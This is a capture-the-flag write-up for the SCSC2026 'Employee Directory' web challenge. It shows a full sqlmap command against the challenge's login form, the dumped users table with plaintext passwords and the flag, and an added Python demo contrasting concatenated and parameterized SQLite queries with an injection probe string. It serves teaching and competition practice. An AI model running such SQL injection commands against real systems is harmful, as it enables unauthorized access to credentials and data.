SCSC2026 Final - Employee Directory - Web Writeup
Category: Web
Flag: SCSC26{sql_1nj3ct10n_1s_cl4ss1c}
Description: SCSC Employee Directory application (Beta). Currently restricted to Administrators only until the public release. We use a lightweight SQLite database. Unfortunately, the programmer forgot to sanitize the input on the login form.
The site was a small PHP login form for an employee directory. The description already named SQLite and missing input sanitization, so the login request was the target. I sent the form data to sqlmap and pointed it at the username parameter.
sqlmap -u "http://sriwijayasecuritysociety.com:8008/" \
--data="username=adw&password=awd" \
-p username \
--dbms=sqlite \
--level=5 \
--risk=3 \
--all
+----+----------------------------------+------------------+----------+
| id | fullname | password | username |
+----+----------------------------------+------------------+----------+
| 1 | SCSC26{sql_1nj3ct10n_1s_cl4ss1c} | complex_pass_123 | admin |
| 2 | Guest User | guest | guest |
+----+----------------------------------+------------------+----------+
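The root cause described above, as an added illustration that is not part of the original writeup: a login query built by string concatenation against a constructed in-memory SQLite table (same columns as the dump, with placeholder data) next to the parameterized form that fixes it. The PHP login code is not shown on the page, so the vulnerable query shape here is an assumption.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the challenge's SQLite users table
    # (same column layout as the sqlmap dump, placeholder values).
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, fullname TEXT, "
        "password TEXT, username TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (fullname, password, username) VALUES (?, ?, ?)",
        [("Site Admin", "complex_pass_123", "admin"), ("Guest User", "guest", "guest")],
    )
    return conn


def login_unsafe(conn, username, password):
    # Vulnerable (assumed shape of the challenge's login): user input is
    # spliced into the SQL text, so a quote or comment marker in `username`
    # changes the structure of the query instead of being compared as data.
    sql = (
        "SELECT username FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Hardened: bound parameters keep the input as a value; the SQL text is
    # fixed, so no input can alter the WHERE clause.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    probe = "admin' --"  # constructed test input carrying a quote and a comment
    print("unsafe:", login_unsafe(db, probe, "wrong"))  # → admin
    print("safe:  ", login_safe(db, probe, "wrong"))    # → None
```

The same parameter-binding fix applies to PDO prepared statements in PHP; storing password hashes instead of the plaintext values seen in the dump limits the damage once a table is exposed.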
https://blog.rei.my.id/posts/160/scsc2026-final-employee-directory-web-writeup/